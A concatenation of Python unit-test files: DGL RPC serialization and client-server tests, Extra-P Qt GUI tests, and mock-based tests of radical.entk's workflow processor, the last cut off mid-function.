    # Request fixture carrying an int, a string, a tensor and a function;
    # used to verify all of them survive RPC (de)serialization.
    def __init__(self):
        self.x = 123
        self.y = "abc"
        self.z = F.randn((3, 4))
        self.foo = foo

    def __getstate__(self):
        # Everything returned here ends up in the serialized payload.
        return self.x, self.y, self.z, self.foo

    def __setstate__(self, state):
        self.x, self.y, self.z, self.foo = state

    def process_request(self, server_state):
        # Not exercised by the serialization tests; nothing to do.
        pass
class MyResponse(dgl.distributed.Response):
    # Minimal response fixture carrying a single int payload.
    def __init__(self):
        self.x = 432

    def __getstate__(self):
        return self.x

    def __setstate__(self, state):
        self.x = state
def simple_func(tensor):
    # Identity transform used as the remotely-executed payload function in
    # HelloRequest.
    return tensor
class HelloResponse(dgl.distributed.Response):
    # Echo response: carries the request's string, integer and tensor back
    # to the client.
    def __init__(self, hello_str, integer, tensor):
        self.hello_str = hello_str
        self.integer = integer
        self.tensor = tensor

    def __getstate__(self):
        return self.hello_str, self.integer, self.tensor

    def __setstate__(self, state):
        self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
    # Request whose server-side handler applies `func` to the tensor and
    # echoes everything back in a HelloResponse.
    def __init__(self, hello_str, integer, tensor, func):
        self.hello_str = hello_str
        self.integer = integer
        self.tensor = tensor
        self.func = func

    def __getstate__(self):
        return self.hello_str, self.integer, self.tensor, self.func

    def __setstate__(self, state):
        self.hello_str, self.integer, self.tensor, self.func = state

    def process_request(self, server_state):
        # Validate the payload arrived intact, transform the tensor, reply.
        assert self.hello_str == STR
        assert self.integer == INTEGER
        new_tensor = self.func(self.tensor)
        res = HelloResponse(self.hello_str, self.integer, new_tensor)
        return res
def start_server():
    # Run a single DGL RPC server (id 0) serving the hello service for one
    # client; blocks until the client shuts the server down.
    server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
    dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
    dgl.distributed.start_server(server_id=0,
                                 ip_config='rpc_ip_config.txt',
                                 num_clients=1,
                                 server_state=server_state)
def start_client():
    """Exercise every client-side RPC path (send/recv, remote_call and their
    per-machine variants) against server 0, then shut the server down."""
    def _check_response(res):
        # Every reply must echo the request payload unchanged.
        assert res.hello_str == STR
        assert res.integer == INTEGER
        assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))

    dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
    dgl.distributed.connect_to_server(ip_config='rpc_ip_config.txt')
    req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
    # test send and recv
    dgl.distributed.send_request(0, req)
    _check_response(dgl.distributed.recv_response())
    # test remote_call
    target_and_requests = [(0, req) for _ in range(10)]
    for res in dgl.distributed.remote_call(target_and_requests):
        _check_response(res)
    # test send_request_to_machine
    dgl.distributed.send_request_to_machine(0, req)
    _check_response(dgl.distributed.recv_response())
    # test remote_call_to_machine
    for res in dgl.distributed.remote_call_to_machine(target_and_requests):
        _check_response(res)
    # clean up
    dgl.distributed.shutdown_servers()
    dgl.distributed.finalize_client()
def test_serialize():
    # A request/response must round-trip through serialize_to_payload /
    # deserialize_from_payload with all fields intact, including a tensor
    # and a plain function.
    from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
    SERVICE_ID = 12345
    dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
    req = MyRequest()
    data, tensors = serialize_to_payload(req)
    req1 = deserialize_from_payload(MyRequest, data, tensors)
    # The deserialized function must still run against its own payload.
    req1.foo(req1.x, req1.y)
    assert req.x == req1.x
    assert req.y == req1.y
    assert F.array_equal(req.z, req1.z)

    res = MyResponse()
    data, tensors = serialize_to_payload(res)
    res1 = deserialize_from_payload(MyResponse, data, tensors)
    assert res.x == res1.x
def test_rpc_msg():
    # An RPCMessage must faithfully carry the service id, sequence number,
    # endpoint ids, serialized data and tensor payload.
    from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
    SERVICE_ID = 32452
    dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
    req = MyRequest()
    data, tensors = serialize_to_payload(req)
    rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
    assert rpcmsg.service_id == SERVICE_ID
    assert rpcmsg.msg_seq == 23
    assert rpcmsg.client_id == 0
    assert rpcmsg.server_id == 1
    assert len(rpcmsg.data) == len(data)
    assert len(rpcmsg.tensors) == 1
    assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
    """End-to-end RPC test: spawn a server and a client process and wait
    for both to finish."""
    # Write a one-machine ip config consumed by both processes.
    # FIX: use a context manager so the file handle is closed (and flushed)
    # even if writing fails.
    with open("rpc_ip_config.txt", "w") as ip_config:
        ip_config.write('%s 1\n' % get_local_usable_addr())
    ctx = mp.get_context('spawn')
    pserver = ctx.Process(target=start_server)
    pclient = ctx.Process(target=start_client)
    pserver.start()
    time.sleep(1)  # give the server a head start before the client connects
    pclient.start()
    pserver.join()
    pclient.join()
if __name__ == '__main__':
    # Run the RPC tests directly (without pytest).
    test_serialize()
    test_rpc_msg()
    test_rpc()
|
test_gui.py | # This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import sys
import unittest
import warnings
from threading import Thread
from PySide2.QtCore import QRect, QItemSelectionModel
from PySide2.QtWidgets import QApplication, QCheckBox, QPushButton
from extrap.extrap import extrapgui
from extrap.fileio.text_file_reader import read_text_file
from extrap.gui.AdvancedPlotWidget import AdvancedPlotWidget
from extrap.gui.MainWidget import MainWidget, QCoreApplication
# Try to start a shared Qt application for all GUI tests; if the environment
# cannot create one (e.g. no display server), app_thread stays None and the
# tests below skip themselves.
try:
    APP = QApplication()
    APP.setStyle('Fusion')
    app_thread = Thread(target=APP.exec_)
except:
    app_thread = None
    pass
class TestGuiCommon(unittest.TestCase):
    # Base class for GUI tests: (re)starts the shared Qt event-loop thread
    # and opens a hidden MainWidget per test; skips when the GUI could not
    # be created at import time.

    def setUp(self) -> None:
        global app_thread
        if not app_thread:
            raise unittest.SkipTest("GUI could not start.")
        if not app_thread.is_alive():
            app_thread = Thread(target=APP.exec_)
            app_thread.start()
        self.window = MainWidget()
        self.window.hide()

    def tearDown(self):
        if not app_thread:
            raise unittest.SkipTest("GUI could not start.")
        # Bypass any confirmation dialog in closeEvent so teardown never blocks.
        self.window.closeEvent = lambda e: e.accept()
        self.window.close()

    def test_line_graph(self):
        # The line-graph tab is open by default; after removing it,
        # reloading tab 0 must bring it back.
        data_display = self.window.data_display
        self.assertTrue(data_display.ifTabAlreadyOpened("Line graph"))
        data_display.display_widget.tabBar().removeTab(0)
        self.assertFalse(data_display.ifTabAlreadyOpened("Line graph"))
        data_display.reloadTabs([0])
        self.assertTrue(data_display.ifTabAlreadyOpened("Line graph"))
class TestGuiExperimentLoaded(TestGuiCommon):
    # GUI tests that require a modeled experiment loaded into the window.

    def setUp(self) -> None:
        super().setUp()
        exp = read_text_file('data/text/one_parameter_6.txt')
        self.window.model_experiment(exp)

    def test_graph_model_multiple_selected(self):
        # With every model selected, all plot tabs must (re)draw and keep
        # their graph display windows.
        data_display = self.window.data_display
        self.window.selector_widget.tree_view.selectAll()
        # check graphs
        tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
        data_display.reloadTabs(tabs)
        for i in tabs:
            data_display.display_widget.setCurrentIndex(i)
            p = data_display.display_widget.currentWidget()
            if isinstance(p, AdvancedPlotWidget):
                self.assertIsNotNone(p.graphDisplayWindow)
                p.drawGraph()
                self.assertIsNotNone(p.graphDisplayWindow)
            QCoreApplication.processEvents()

    def test_graph_model_one_selected(self):
        # Selecting a single row must still let every tab draw.
        data_display = self.window.data_display
        self.window.selector_widget.tree_view.setSelection(QRect(0, 0, 1, 1), QItemSelectionModel.SelectionFlag.Rows)
        # check graphs
        tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
        data_display.reloadTabs(tabs)
        for i in tabs:
            data_display.display_widget.setCurrentIndex(i)
            p = data_display.display_widget.currentWidget()
            if isinstance(p, AdvancedPlotWidget):
                self.assertIsNotNone(p.graphDisplayWindow)
                p.drawGraph()
                self.assertIsNotNone(p.graphDisplayWindow)
            QCoreApplication.processEvents()

    def test_graph_no_model_selected(self):
        # With an experiment loaded but no selection, tabs must still redraw
        # without losing their graph display windows.
        data_display = self.window.data_display
        # check graphs
        tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
        data_display.reloadTabs(tabs)
        for i in tabs:
            data_display.display_widget.setCurrentIndex(i)
            p = data_display.display_widget.currentWidget()
            if isinstance(p, AdvancedPlotWidget):
                self.assertIsNotNone(p.graphDisplayWindow)
                p.drawGraph()
                self.assertIsNotNone(p.graphDisplayWindow)
            QCoreApplication.processEvents()

    def test_modeler_options_reset(self):
        # Toggle one modeler-option checkbox, press reset, and verify the
        # checkbox returns to its original state.
        modeler_widget = self.window.modeler_widget
        modeler_widget._options_container.toggle(False)
        QCoreApplication.processEvents()
        checkbox = None
        reset_button = None
        # Find the first reset button and the first checkbox among the
        # option widgets.
        for child in modeler_widget._options_container.content().children():
            QCoreApplication.processEvents()
            if not reset_button and isinstance(child, QPushButton):
                reset_button = child
            elif not checkbox and isinstance(child, QCheckBox):
                checkbox = child
            elif reset_button and checkbox:
                break
        if checkbox:
            old_state = checkbox.isChecked()
            checkbox.toggle()
            QCoreApplication.processEvents()
            self.assertNotEqual(old_state, checkbox.isChecked())
            reset_button.click()
            # Re-locate the checkbox: reset may have rebuilt the widgets.
            for child in modeler_widget._options_container.content().children():
                QCoreApplication.processEvents()
                if isinstance(child, QCheckBox):
                    checkbox = child
                    break
            self.assertEqual(old_state, checkbox.isChecked())
class TestGuiLoadExperiment(unittest.TestCase):
    # Starts a full GUI via extrapgui.main and checks an experiment can be
    # loaded into it; restores the global warning/exception hooks the GUI
    # replaces.

    def test_load_experiment(self):
        _old_warnings_handler = warnings.showwarning
        _old_exception_handler = sys.excepthook
        try:
            window, app = extrapgui.main(test=True, args=[])
            exp = read_text_file('data/text/one_parameter_1.txt')
            self.assertIsNone(window.experiment)
            window.model_experiment(exp)
            QCoreApplication.processEvents()
            self.assertIsNotNone(window.experiment)
            # Bypass any confirmation dialog so the window closes cleanly.
            window.closeEvent = lambda e: e.accept()
            window.close()
        finally:
            warnings.showwarning = _old_warnings_handler
            sys.excepthook = _old_exception_handler
class TestGuiNoExperiment(TestGuiCommon):
    # GUI behavior before any experiment is loaded.

    def test_generator_button(self):
        # The model button must be disabled without an experiment, but the
        # model-name edit must exist.
        self.assertFalse(self.window.modeler_widget._model_button.isEnabled())
        self.assertTrue(self.window.modeler_widget.model_name_edit)

    def test_graph_no_model_selected(self):
        # Without an experiment, plot widgets have no graph display windows.
        data_display = self.window.data_display
        # check graphs
        tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
        data_display.reloadTabs(tabs)
        for i in tabs:
            data_display.display_widget.setCurrentIndex(i)
            p = data_display.display_widget.currentWidget()
            if isinstance(p, AdvancedPlotWidget):
                self.assertIsNone(p.graphDisplayWindow)
            QCoreApplication.processEvents()
class TestGuiSelectedThenNoModelSelected(TestGuiExperimentLoaded):
    # Re-runs the inherited graph tests in the state "a model was selected,
    # then the current model became unavailable".

    def setUp(self) -> None:
        super().setUp()
        self.test_graph_model_one_selected()
        # Simulate the selector no longer returning a current model.
        self.window.selector_widget.getCurrentModel = lambda: None
if __name__ == '__main__':
    # Allow running the GUI tests directly.
    unittest.main()
|
test_wfp.py | # pylint: disable=protected-access, unused-argument
# pylint: disable=no-value-for-parameter
import os
from unittest import TestCase
# from hypothesis import given, settings, strategies as st
import threading as mt
import time
from radical.entk.appman.wfprocessor import WFprocessor
from radical.entk import states
try:
import mock
except ImportError:
from unittest import mock
# Hypothesis settings
# settings.register_profile("travis", max_examples=100, deadline=None)
# settings.load_profile("travis")
# ------------------------------------------------------------------------------
#
class TestBase(TestCase):
@mock.patch('radical.utils.generate_id', return_value='wfp.0000')
@mock.patch('os.getcwd', return_value='test_folder')
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
@mock.patch('radical.utils.Reporter')
def test_wfp_initialization(self, mocked_generate_id, mocked_getcwd,
mocked_Logger, mocked_Profiler, mocked_Reporter):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
self.assertIsNone(wfp._wfp_process)
self.assertIsNone(wfp._enqueue_thread)
self.assertIsNone(wfp._dequeue_thread)
self.assertIsNone(wfp._enqueue_thread_terminate)
self.assertIsNone(wfp._dequeue_thread_terminate)
self.assertEqual(wfp._rmq_ping_interval, 10)
self.assertEqual(wfp._path, 'test_folder/test_sid')
self.assertEqual(wfp._workflow, 'workflow')
self.assertEqual(wfp._sid, 'test_sid')
self.assertEqual(wfp._pending_queue, 'pending_queue')
self.assertEqual(wfp._completed_queue, 'completed_queue')
self.assertFalse(wfp._resubmit_failed)
self.assertEqual(wfp._rmq_conn_params, 'test_rmq_params')
self.assertEqual(wfp._uid, 'wfp.0000')
os.environ['RMQ_PING_INTERVAL'] = '20'
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=True)
self.assertIsNone(wfp._wfp_process)
self.assertIsNone(wfp._enqueue_thread)
self.assertIsNone(wfp._dequeue_thread)
self.assertEqual(wfp._rmq_ping_interval, 20)
self.assertEqual(wfp._path, 'test_folder/test_sid')
self.assertEqual(wfp._workflow, 'workflow')
self.assertEqual(wfp._sid, 'test_sid')
self.assertEqual(wfp._pending_queue, 'pending_queue')
self.assertEqual(wfp._completed_queue, 'completed_queue')
self.assertTrue(wfp._resubmit_failed)
self.assertEqual(wfp._rmq_conn_params, 'test_rmq_params')
self.assertEqual(wfp._uid, 'wfp.0000')
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_workflow(self, mocked_init, mocked_Logger):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._workflow = 'test_workflow'
self.assertEqual(wfp.workflow, 'test_workflow')
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_wfp_workflow_incomplete(self, mocked_init, mocked_Logger):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._logger = mocked_Logger
pipe = mock.Mock()
pipe.lock = mt.Lock()
pipe.completed = False
wfp._workflow = set([pipe])
self.assertTrue(wfp.workflow_incomplete())
pipe.completed = True
self.assertFalse(wfp.workflow_incomplete())
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
with self.assertRaises(Exception):
wfp.workflow_incomplete()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
def test_check_processor(self, mocked_init):
    """check_processor() reports True only while both worker threads live."""
    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)

    # With no threads at all the processor is not running.
    wfp._enqueue_thread = None
    wfp._dequeue_thread = None
    self.assertFalse(wfp.check_processor())

    # Script the liveness of both threads over four successive calls;
    # only the (alive, alive) combination counts as running.
    wfp._enqueue_thread = mock.Mock()
    wfp._dequeue_thread = mock.Mock()
    wfp._enqueue_thread.is_alive = mock.MagicMock(
        side_effect=[False, False, True, True])
    wfp._dequeue_thread.is_alive = mock.MagicMock(
        side_effect=[False, True, False, True])
    self.assertFalse(wfp.check_processor())   # dead  / dead
    self.assertFalse(wfp.check_processor())   # dead  / alive
    self.assertFalse(wfp.check_processor())   # alive / dead
    self.assertTrue(wfp.check_processor())    # alive / alive
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
@mock.patch('time.sleep', return_value=None)
@mock.patch.object(WFprocessor, '_create_workload',
                   side_effect=[['task', 'stages'], []])
@mock.patch.object(WFprocessor, '_execute_workload', return_value=True)
def test_enqueue(self, mocked_execute_workload, mocked_create_workload,
                 mocked_sleep, mocked_Profiler, mocked_Logger, mocked_init):
    """_enqueue() drains workloads until the terminate event is set.

    Fixes: the original spelled ``retur_value`` (which merely sets a stray
    attribute on the mock instead of configuring its return value), and
    listed the injected mocks in the wrong order — stacked ``mock.patch``
    decorators hand mocks to the function bottom-up.
    """
    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._logger = mocked_Logger
    wfp._prof = mocked_Profiler
    wfp._uid = 'wfp.0000'
    wfp._enqueue_thread_terminate = mock.Mock()
    wfp._enqueue_thread_terminate.is_set = mock.MagicMock(
        side_effect=[False, True])
    wfp._enqueue()
    # Second run exhausts the two-element side_effect lists -> must raise.
    with self.assertRaises(Exception):
        wfp._enqueue()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
def test_advance(self, mocked_Reporter, mocked_Logger, mocked_init):
    """_advance() profiles a state transition with the right parent uid.

    Fix: mock parameters renamed to the bottom-up order stacked
    ``mock.patch`` decorators inject them in (original order was reversed).
    """
    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    global_profs = []

    def _log(log_entry, uid, state, msg):
        # Record every profiler call for later inspection.
        global_profs.append([log_entry, uid, state, msg])

    wfp._logger = mocked_Logger
    wfp._report = mocked_Reporter
    wfp._prof = mock.Mock()
    wfp._prof.prof = mock.MagicMock(side_effect=_log)
    wfp._uid = 'wfp.0000'
    obj = mock.Mock()
    obj.parent_stage = {'uid': 'test_stage'}
    obj.parent_pipeline = {'uid': 'test_pipe'}
    obj.uid = 'test_object'
    obj.state = 'test_state'

    # Tasks are profiled against their parent stage ...
    wfp._advance(obj, 'Task', None)
    self.assertEqual(global_profs[0],
                     ['advance', 'test_object', None, 'test_stage'])
    global_profs = []
    # ... stages against their parent pipeline ...
    wfp._advance(obj, 'Stage', 'new_state')
    self.assertEqual(global_profs[0],
                     ['advance', 'test_object', 'new_state', 'test_pipe'])
    global_profs = []
    # ... and pipelines with no parent at all.
    wfp._advance(obj, 'Pipe', 'new_state')
    self.assertEqual(global_profs[0],
                     ['advance', 'test_object', 'new_state', None])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch.object(WFprocessor, '_advance', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
def test_create_workload(self, mocked_Reporter, mocked_Logger,
                         mocked_advance, mocked_init):
    """An INITIAL task inside a SCHEDULING stage becomes workload.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._resubmit_failed = False
    pipe = mock.Mock()
    pipe.lock = mt.Lock()
    pipe.state = states.INITIAL
    pipe.completed = False
    pipe.current_stage = 1
    stage = mock.Mock()
    stage.uid = 'stage.0000'
    stage.state = states.SCHEDULING
    task = mock.Mock()
    task.uid = 'task.0000'
    task.state = states.INITIAL
    stage.tasks = [task]
    pipe.stages = [stage]
    wfp._workflow = set([pipe])
    workload, scheduled_stages = wfp._create_workload()
    self.assertEqual(workload, [task])
    self.assertEqual(scheduled_stages, [stage])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('json.dumps', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
@mock.patch('pika.BlockingConnection')
def test_execute_workload(self, mocked_BlockingConnection, mocked_Reporter,
                          mocked_Logger, mocked_dumps, mocked_init):
    """_execute_workload() advances tasks then their stage to SCHEDULED.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_advs = []

    def _advance_side_effect(obj, obj_type, state):
        global_advs.append([obj, obj_type, state])

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._rmq_conn_params = 'test_rmq_params'
    wfp._pending_queue = ['test_queue']
    wfp._logger = mocked_Logger
    wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
    stage = mock.Mock()
    stage.uid = 'stage.0000'
    stage.state = states.SCHEDULING
    task = mock.Mock()
    task.uid = 'task.0000'
    task.state = states.INITIAL
    workload = [task]
    stage.tasks = [task]
    scheduled_stages = [stage]
    wfp._execute_workload(workload, scheduled_stages)
    self.assertEqual(global_advs[0], [task, 'Task', 'SCHEDULED'])
    self.assertEqual(global_advs[1], [stage, 'Stage', 'SCHEDULED'])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_reset_workload(self, mocked_Logger, mocked_init):
    """reset_workflow() rolls scheduled tasks/stages back while leaving
    completed and suspended pipelines untouched.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_advs = []

    def _advance_side_effect(obj, obj_type, state):
        global_advs.append([obj, obj_type, state])

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._logger = mocked_Logger
    wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
    # An active pipeline with a scheduled stage/task: should be reset.
    pipe = mock.Mock()
    pipe.lock = mt.Lock()
    pipe.state = states.SCHEDULING
    pipe.completed = False
    pipe.current_stage = 1
    stage = mock.Mock()
    stage.uid = 'stage.0000'
    stage.state = states.SCHEDULED
    task = mock.Mock()
    task.uid = 'task.0000'
    task.state = states.SCHEDULED
    stage.tasks = [task]
    pipe.stages = [stage]
    # A completed pipeline and a suspended one: must not be touched.
    pipe2 = mock.Mock()
    pipe2.lock = mt.Lock()
    pipe2.state = states.DONE
    pipe2.uid = 'pipe.0001'
    pipe2.completed = True
    pipe3 = mock.Mock()
    pipe3.lock = mt.Lock()
    pipe3.state = states.SUSPENDED
    pipe3.uid = 'pipe.0002'
    pipe3.completed = False
    wfp._workflow = set([pipe, pipe2, pipe3])
    wfp.reset_workflow()
    self.assertEqual(global_advs[0], [task, 'Task', 'DESCRIBED'])
    self.assertEqual(global_advs[1], [stage, 'Stage', 'SCHEDULING'])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_execute_post_exec(self, mocked_Profiler, mocked_Logger,
                           mocked_init):
    """_execute_post_exec() resumes the pipelines named by post_exec();
    already-completed ones are advanced to DONE instead.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_advs = set()

    def _advance_side_effect(obj, obj_type, state):
        global_advs.add((obj, obj_type, state))

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._uid = 'wfp.0000'
    wfp._logger = mocked_Logger
    wfp._prof = mocked_Profiler
    wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
    pipe = mock.Mock()
    pipe.lock = mt.Lock()
    pipe.state = states.INITIAL
    pipe.uid = 'pipe.0000'
    pipe.completed = False
    pipe._increment_stage = mock.MagicMock(return_value=True)
    pipe.current_stage = 1
    pipe2 = mock.Mock()
    pipe2.lock = mt.Lock()
    pipe2.state = states.INITIAL
    pipe2.uid = 'pipe.0001'
    pipe2.completed = False
    pipe2._increment_stage = mock.MagicMock(return_value=True)
    pipe2.current_stage = 1
    pipe3 = mock.Mock()
    pipe3.lock = mt.Lock()
    pipe3.state = states.INITIAL
    pipe3.uid = 'pipe.0002'
    pipe3.completed = True
    pipe3._increment_stage = mock.MagicMock(return_value=True)
    pipe3.current_stage = 1
    wfp._workflow = set([pipe2, pipe3])
    stage = mock.Mock()
    stage.uid = 'stage.0000'
    stage.state = states.SCHEDULING
    stage.post_exec = mock.MagicMock(return_value=['pipe.0001', 'pipe.0002'])
    wfp._execute_post_exec(pipe, stage)
    exp_out = set([(pipe2, 'Pipeline', states.INITIAL),
                   (pipe3, 'Pipeline', states.DONE)])
    self.assertEqual(global_advs, exp_out)
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch.object(WFprocessor, '_advance', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_update_dequeued_task(self, mocked_Profiler, mocked_Logger,
                              mocked_advance, mocked_init):
    """_update_dequeued_task() maps exit codes to task states
    (0 -> DONE, None -> unchanged, nonzero -> FAILED).

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_advs = list()

    def _advance_side_effect(obj, obj_type, state):
        global_advs.append([obj, obj_type, state])

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._uid = 'wfp.0000'
    wfp._logger = mocked_Logger
    wfp._prof = mocked_Profiler
    wfp._resubmit_failed = False
    wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
    pipe = mock.Mock()
    pipe.uid = 'pipe.0000'
    pipe.lock = mt.Lock()
    pipe.state = states.INITIAL
    pipe.completed = False
    pipe.current_stage = 1
    pipe._increment_stage = mock.MagicMock(return_value=2)
    stage = mock.Mock()
    stage.uid = 'stage.0000'
    stage.state = states.SCHEDULING
    stage._check_stage_complete = mock.MagicMock(return_value=True)
    stage.post_exec = None
    task = mock.Mock()
    task.uid = 'task.0000'
    task.parent_pipeline = {'uid': 'pipe.0000'}
    task.parent_stage = {'uid': 'stage.0000'}
    task.state = states.INITIAL
    task.exit_code = 0
    stage.tasks = [task]
    pipe.stages = [stage]
    wfp._workflow = set([pipe])
    # Test for issue #271
    wfp._update_dequeued_task(task)
    self.assertEqual(global_advs[0], [task, 'Task', states.DONE])
    self.assertEqual(global_advs[1], [stage, 'Stage', states.DONE])
    task.state = states.INITIAL
    task.exit_code = None
    wfp._update_dequeued_task(task)
    self.assertEqual(global_advs[2], [task, 'Task', states.INITIAL])
    self.assertEqual(global_advs[3], [stage, 'Stage', states.DONE])
    task.exit_code = 1
    wfp._update_dequeued_task(task)
    self.assertEqual(global_advs[4], [task, 'Task', states.FAILED])
    self.assertEqual(global_advs[5], [stage, 'Stage', states.DONE])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_start_processor(self, mocked_Profiler, mocked_Logger,
                         mocked_init):
    """start_processor() spawns enqueue/dequeue threads and their events.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_boolean = {}

    def _dequeue_side_effect():
        global_boolean['dequeue'] = True

    def _enqueue_side_effect():
        global_boolean['enqueue'] = True

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._uid = 'wfp.0000'
    wfp._logger = mocked_Logger
    wfp._prof = mocked_Profiler
    wfp._enqueue_thread = None
    wfp._dequeue_thread = None
    wfp._enqueue_thread_terminate = None
    wfp._dequeue_thread_terminate = None
    wfp._dequeue = mock.MagicMock(side_effect=_dequeue_side_effect)
    wfp._enqueue = mock.MagicMock(side_effect=_enqueue_side_effect)
    wfp.start_processor()
    # Give both worker threads time to run their (mocked) bodies.
    time.sleep(1)
    try:
        self.assertIsInstance(wfp._enqueue_thread_terminate, mt.Event)
        self.assertIsInstance(wfp._dequeue_thread_terminate, mt.Event)
        self.assertIsInstance(wfp._dequeue_thread, mt.Thread)
        self.assertIsInstance(wfp._enqueue_thread, mt.Thread)
        self.assertTrue(global_boolean['dequeue'])
        self.assertTrue(global_boolean['enqueue'])
    finally:
        # Always reap the threads, even when an assertion fails.
        if wfp._dequeue_thread.is_alive():
            wfp._dequeue_thread.join()
        if wfp._enqueue_thread.is_alive():
            wfp._enqueue_thread.join()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_terminate_processor(self, mocked_Profiler, mocked_Logger,
                             mocked_init):
